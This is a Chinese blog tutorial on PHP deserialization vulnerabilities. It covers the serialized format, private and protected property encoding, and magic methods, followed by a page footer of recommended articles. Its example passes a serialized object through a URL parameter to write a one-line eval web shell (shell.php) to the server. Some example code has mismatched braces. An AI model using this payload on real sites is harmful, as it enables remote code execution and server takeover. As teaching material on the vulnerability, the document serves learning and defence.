PHP反序列化

最新推荐文章于 2025-05-20 20:15:22 发布
最新推荐文章于 2025-05-20 20:15:22 发布
阅读量320 收藏
点赞数 7
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_63963927/article/details/133928917
版权

基础:PHP反序列化学习总结(新手入门) - 知乎 (zhihu.com)

进阶:thinkphp5.0.24反序列化漏洞分析_thinkphp v5.0.24_Sk1y的博客-优快云博客

涉及函数

序列化:serialize()

反序列化:unserialize()

反序列化漏洞原理


序列化:将对象的状态信息转换为可以存储或传输的形式的过程,一般将对象转换为字节流。序列化时,对象的当前状态被写入到临时或持久性存储区(文件、内存、数据库等)。

反序列化:从序列化的表示形式中提取数据,即把有序字节流恢复为对象的过程

反序列化攻击:攻击者控制了序列化后的数据,将有害数据传递到应用程序代码中,发动针对应用程序的攻击


 基础

序列化:
将对象序列化为字符串
 
<?php 
class person{
	public $name='zhangsan';
	public $sex='boy';
	public $age='18';
}
$zhangsan=new person();
$str=serialize($zhangsan);
echo $str;
?>

O:6:"person":3:{s:4:"name";s:8:"zhangsan";s:3:"sex";s:3:"boy";s:3:"age";s:2:"18";}
 
O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示
6 代表类名字占三个字符 
person 类名
3 代表三个属性
s代表字符串
4代表属性名长度
name属性名
s:4:"name" 字符串 属性值长度 属性值
 
 
protected和private有不可打印字符,需进行url编码再输出
protected属性被序列化后属性名长度会增加3,因为属性名会变成%00*%00属性名。
private属性被序列化后属性名会变成%00类名%00属性名。

反序列化:
将字符串反序列化为对象
 
<?php 
class person{
	public $name='zhangsan';
	public $sex='boy';
	public $age='18';
   }
   public function __destruct(){
    echo 22222222;   
   }
 
}
$a='O:6:"person":3:{s:4:"name";s:8:"zhangsan";s:3:"sex";s:3:"boy";s:3:"age";s:2:"18";}';
$str=unserialize($a);
?>

常见魔术方法 

__construct(),类的构造函数,当一个对象创建时被调用
 
__destruct(),类的析构函数,当一个对象销毁时被调用
 
__call(),在对象中调用一个不可访问/不存在的方法时调用
 
__callStatic(),用静态方式中调用一个不可访问方法时调用
 
__get(),获得一个类的成员变量时调用
 
__set(),在给不可访问(private或protected)或不存在的属性赋值时触发
 
__isset(),当对不可访问属性调用isset()或empty()时调用
 
__unset(),当对不可访问属性调用unset()时被调用
 
__sleep(),执行serialize()时,先会调用这个函数
 
__wakeup(),执行unserialize()时,先会调用这个函数
 
__toString(),类被当成字符串时会调用该方法
 
__invoke(),当脚本尝试将对象调用为函数时触发
 
__set_state(),调用var_export()导出类时,此静态方法会被调用
 
__clone(),当对象复制完成时调用
 
__autoload(),尝试加载未定义的类
 
__debugInfo(),打印所需调试信息

 PHP反序列化例子

执行带有魔术方法的1.php文件,这段代码为序列化,可以理解成编码

运行1.php文件,获得序列化后的值 

在url栏中输入:

1.php?id=O:6:"person":3:{s:4:"name";s:27:"<?php eval($_REQUEST[a]);?>";s:3:"sex";s:3:"boy";s:3:"age";s:2:"18";}

查看源码:

 

 

在后台发现生成了名为shell.php的文件 

可以运行shell.php文件

 

 

拾 味
关注
php反序列化1_常见php序列化的CTF考题
书山有路勤为径,学海无涯苦作舟
11-25 1786
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
php反序列化
doubirui的博客
03-23 2668
一个预定义好的,在特定情况下自动触发的行为方法。
PHP 反序列化
sky123博客
06-28 938
PHP 4 中,提供了__sleep和__wakeup这两个魔术方法来自定义对象的序列化。这两个方法并不会改变对象序列化的格式,而是影响被序列化字段的个数。__sleep:在对象被序列化时调用。它应该返回一个包含对象中所有需要被序列化的属性名的数组。__wakeup():在对象被反序列化时调用。它通常用来完成序列化后的初始化任务。// 模拟数据库连接// 在序列化前关闭数据库连接// 返回需要序列化的属性数组// 在反序列化时重新建立数据库连接// 创建对象并序列化。
php反序列化总结
wbqww_的博客
10-15 1017
public 表示全局,类内部外部子类都可以访问;protected表示受保护的,只有本类或子类或父类中可以访问;IMPORTANT]protected受保护属性序列化时在变量名前加"%00*%00"private表示私有的,只有本类内部可以使用;IMPORTANT]private私有属性序列化时在变量名前加"%00类名%00"数组:a array:3参数数量:{i:0编号;i:1;i:2;O object:4类名长度:"test"类名:1变量数量:{s:3变量名字长度:"pub"变量名字;
php反序列化原理
byll1024的博客
05-20 1317
PHP反序列化是将经过序列化的字符串恢复成原始数据结构的过程。序列化是指将复杂数据结构(如数组、对象)转换为可存储或传输的字符串形式,而反序列化则是将这些字符串重新转换回原来的数据结构。在PHP中,这通常通过`unserialize()`函数实现。这个函数读取序列化字符串,并根据其中包含的信息重建原始的数据结构。需要注意的是,反序列化过程可能会执行字符串中包含的代码,因此存在安全风险。为了避免潜在的安全隐患,建议只对可信的序列化字符串进行反序列化操作。
php反序列化入门
2303_81631620的博客
06-01 1276
序列化是将对象或数组转化为方便存储、传输的字符串,php使用serialize()函数将对象序列化;序列化只作用于对象的成员属性,不序列化成员方法。
PHP反序列化_1
九尾ww的博客
11-10 1109
PHP 反序列化漏洞主要是由于应用程序在处理用户输入的序列化数据时没有进行充分的验证和过滤,导致攻击者可以构造恶意的序列化数据来执行任意代码或进行其他恶意操作。在 PHP 中,魔术方法是一些以双下划线开头和结尾的特殊方法,它们在特定的情况下会自动被调用。在反序列化过程中,一些魔术方法可能会被恶意利用来执行攻击代码。序列化在 PHP 中是一种将复杂数据结构转换为字符串以便存储或传输的重要机制。反序列化则是将序列化后的字符串还原为原始数据结构的操作,使用。方法中的恶意代码,删除系统中的所有文件。
php反序列化靶场,集合了常见的php反序列化漏洞——由这周末在做梦制作.zip
01-16
通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
总之,PHP反序列化过程中的对象注入问题主要源于过滤函数处理不当导致的字符串长度变化。开发者在编写代码时应谨慎处理用户输入,并确保过滤和反序列化操作的安全性。正确使用过滤函数,避免在过滤后改变原始序列化...
RabbitMQ-高级
2302_77423520的博客
05-19 793
本文系统讲解了RabbitMQ高可靠方案,涵盖生产者确认、持久化机制、消费者重试策略及幂等性保障,同时解析了延迟消息的两种实现方式(死信交换机和插件)。通过配置重试、ACK机制和Lazy Queue优化性能与可靠性,结合业务场景设计兜底方案,确保消息最终一致性。学习后深刻体会到消息队列在分布式系统中保障数据安全与高效传输的核心价值。
如何在WordPress网站上添加即时聊天功能
05-20 981
在 WordPress 网站上添加即时聊天功能可以显著提升用户体验和业务转化率。即时聊天不仅能够实现与客户的实时互动,还能通过人工智能和自动化功能提供24/7全天候支持,帮助提高销售转化率并优化客户服务流程。本文介绍了如何在 WordPress 网站上使用 Tidio 插件添加即时聊天功能,包括账户创建、插件安装、聊天小工具定制和测试等步骤。此外,还探讨了其他即时聊天插件选项,如 HubSpot、JivoChat 和 LiveChat,以满足不同需求。通过即时聊天功能,企业可以更好地与客户互动,提升服务质量
PHP8.0版本导出excel失败
pengone的博客
05-17 362
失败原因分析:只有最后一步$writer->save 失败,由于php8.0版本缺少8.2版本的一些新特性导致失败,可以尝试升级或者回退版本。环境:fastadmin框架,不是原版接手的项目。PHP8.0,mysql5.7.// 创建一个新的 Spreadsheet 对象。// 设置 HTTP 头信息。
turn.js与 PHP 结合使用来实现 PDF 文件的页面切换效果
luck332的专栏
05-17 423
将 Turn.js 与 PHP 结合使用来实现 PDF 文件的页面切换效果,你需要一个中间步骤将 PDF 转换为 Turn.js 可以处理的格式。你需要一个 PHP 库来将 PDF 转换为图片。一个常用的库是 imagick,它可以通过 PHP 的扩展来处理图像。
php、laravel框架下如何将一个png图片转化为jpg格式
一眼青苔
05-20 318
内置 GD 库:无需额外安装,适合简单的图像格式转换。 第三方包 Intervention/image:功能更强大,代码更简洁,适合复杂的图像处理需求。
upload-labs靶场通关详解:第12-13关
最新发布
CL1799438883的博客
05-20 492
然而,由于空字节的存在,程序会错误地认为字符串在php之后就结束了,从而把扩展名识别为php。在 C 语言和受其影响的编程语言(像 PHP)里,空字节(也就是\0,对应的 ASCII 码为 0)被用作字符串的结束符。当程序在处理包含空字节的字符串时,可能会错误地将空字节之后的内容忽略掉,把空字节前面的部分当作完整的字符串。可以看到文件应该被命名为777.php�/1320250520193657.jpg,这个�就是00截断,在保存到服务器时,会被误以为到空字节就结束,所以文件被保存为777.php
NBA足球赛事直播源码体育直播M33模板赛事源码
05-17 325
源码名称:体育直播赛事扁平自适应M33直播模板源码开发环境:帝国cms7.5空间支持:php+mysql带软件采集,可以挂着自动采集发布,无需人工操作!
如何用PDO实现安全的数据库操作:避免SQL注入
2402_82472226的博客
05-16 415
本文介绍了如何使用PHP的PDO扩展实现安全的数据库操作,避免SQL注入攻击。SQL注入是一种常见的安全漏洞,攻击者通过恶意输入操控数据库。PDO通过预处理语句和参数绑定有效防止SQL注入。文章详细说明了如何创建PDO连接、使用预处理语句和参数绑定,并建议设置错误模式为异常以更好地处理错误。通过合理利用PDO的功能,可以显著提高应用的安全性,防止SQL注入攻击。
深入理解PHP反序列化机制
"PHP 反序列化详解,包括serialize()函数的使用、序列化的概念和示例,以及PHP反序列化格式的解析。" 在PHP中,反序列化是一个至关重要的概念,它允许我们把之前通过序列化过程保存的字节流(通常是存储在文件或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值